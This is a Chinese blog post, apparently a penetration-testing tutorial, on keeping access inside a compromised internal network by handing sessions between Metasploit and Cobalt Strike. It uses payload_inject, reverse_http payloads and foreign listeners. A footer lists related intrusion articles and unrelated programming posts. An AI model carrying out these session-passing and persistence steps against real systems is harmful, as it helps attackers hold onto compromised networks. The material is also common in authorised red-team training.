内网渗透之权限维持 - MSF与cs联动
年初六 六六六
MSF和cs联动
msf连接cs
1.在队伍服务器上启动cs服务端
- ./teamserver 团队服务器ip 连接密码
 
2.cs客户端连接攻击机
- 填团队服务器ip和密码,名字随便
 
msf将session发往cs客户端
1.cs设置监听
监听器 - add
- 选择payload类型和填攻击机ip,端口要对应payload类型
 
2.进入payload注入模块
- use exploit/windows/local/payload_inject
 
3.设置参数
set disablepayloadhandler 1
- 1开启
 
set payload 第一步选的payload类型
- 后面的协议类型一致
示例:
设置的payload是windows/meterpreter/reverse_http
cs选择的payload是windows/beacon_http/reverse_http 
- 后面的协议类型一致
 set lhost
- msf本机ip
 
set lport
- 与第一步对应
 
set session
- 目标机的session id
 
4.运行
run
- cs即可收到session
 
exploit也可
- -j 是隐藏到后台运行,jobs调出
 - -z 是连接后不进入终端
 
cs将shell转发给另一msf
最好用公网机器,内网机器要转发端口
- 1.进入handle模块
 2.设置handle参数
set payload xxxxx
- 全部要一致
 
set lhost
- 本机
 
set lport
- 任意一个,注意不要重复
 
3.cs设置spwan
- 1.add 新会话
 2.设置参数
- msf所在对应的ip和端口
 - payload选foreign
 
3.右键session,选择派生会话
- 选择第二步设置的会话
 
4.exploit 运行
- 即可收到cs派生的session
 
内网渗透之权限维持 - MSF与cs联动的更多相关文章
- 内网渗透之权限维持 - MSF
		
年初九 天公生 0x034 MSF(美少妇) 启动msf msfconsole 先启动msf依赖的postgresql数据库 初始化数据库 msfdb init (要用普通用户) msf路径 /usr ...
 - 利用MSF实现三层网络的一次内网渗透
		
目标IP192.168.31.207 很明显这是一个文件上传的靶场 白名单限制 各种尝试之后发现这是一个检测文件类型的限制 上传php大马文件后抓包修改其类型为 image/jpeg 上传大马之后发 ...
 - 【CTF】msf和impacket联合拿域控内网渗透-拿域控
		
前言 掌控安全里面的靶场内网渗透,练练手! 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也 ...
 - MSF 内网渗透笔记
		
进入meterpreter模式 在meterpreter中输入shell即可进入CMD窗口接着即可执行CMD命令,例如打开RDP服务REG ADD HKLM\SYSTEM\CurrentControl ...
 - metasploit渗透测试笔记(内网渗透篇)
		
x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. r ...
 - Metasploit 内网渗透篇
		
0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. ...
 - 3.内网渗透之reGeorg+Proxifier
		
aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAxIAAAE2CAIAAAB6BDOVAAAgAElEQVR4Aey9Z5Aex3X327MRGVzkRH ...
 - 记录一次坎坷的linux内网渗透过程瞎折腾的坑
		
版权声明:本文为博主的原创文章,未经博主同意不得转载. 写在前面 每个人都有自己的思路和技巧,以前遇到一些linux的环境.这次找来一个站点来进行内网,写下自己的想法 目标环境 1.linux 2. ...
 - Linux内网渗透
		
Linux虽然没有域环境,但是当我们拿到一台Linux 系统权限,难道只进行一下提权,捕获一下敏感信息就结束了吗?显然不只是这样的.本片文章将从拿到一个Linux shell开始,介绍Linux内网渗 ...
 
随机推荐
- Java生成随机图片验证码
			
前台html代码 [Java] 纯文本查看 复制代码 ? 01 02 03 04 05 06 07 08 09 10 <div style="margin-top: 50px;&quo ...
 - SpringBoot常见面试题
			
什么是SpringBootSpringBoot的作用SpringBoot的优点SpringBoot的核心配置文件是什么,有何区别?SpringBoot的配置文件有几种格式,区别是什么?SpringBo ...
 - 吴裕雄--天生自然python学习笔记:Python3 日期和时间
			
Python 程序能用很多方式处理日期和时间,转换日期格式是一个常见的功能. Python 提供了一个 time 和 calendar 模块可以用于格式化日期和时间. 时间间隔是以秒为单位的浮点小数. ...
 - MyBatis SQL语句写法
			
一.forEach 接口: public List<Entity> queryById(List<String> userids); 语法: <select id=&qu ...
 - Docker私有仓库管理
			
docker load -i registry.tar.gz docker run -d -p 5000:5000 --restart=always --name registry -v /opt/m ...
 - Mac下如何使用homebrew
			
Homebrew简称brew,是Mac OSX上的软件包管理工具,能在Mac中方便的安装软件或者卸载软件. 常用的命令: 搜索软件:brew search 软件名,如brew search wget ...
 - struts2和springmvc比较1
			
其实都是ssh只是一个是struts2+spring3.0+hibernate,而另外一个是 springmvc+spring3.0+hibernate,纵向来看比较struts2和springmvc ...
 - 「CometOJ」Contest #11
			
Link Aeon 显然字典序最大就是把最小的字母放在最后 Business [动态规划] 简单dp dp[i][j]dp[i][j]dp[i][j]表示到第iii天,当前有jjj块钱,最后返还的钱最 ...
 - Java ERROR JDWP Unable to get JNI 1.2 environment, jvm
			
Java: ERROR: JDWP Unable to get JNI 1.2 environment, jvm->GetEnv() return code = -2 DWP exit erro ...
 - 会员VS广告:陷入两难抉择的视频网站该如何自救
			
 互联网实在是非常奇妙,其在让一个行业兴起时,却又对传统行业造成严重冲击.比如电商不断创造销售神话,由此成为线下实体店严重萎靡,客流量和销售额直线下降的重要原因之一.但与此同时,因互联网而狂奔的新兴 ...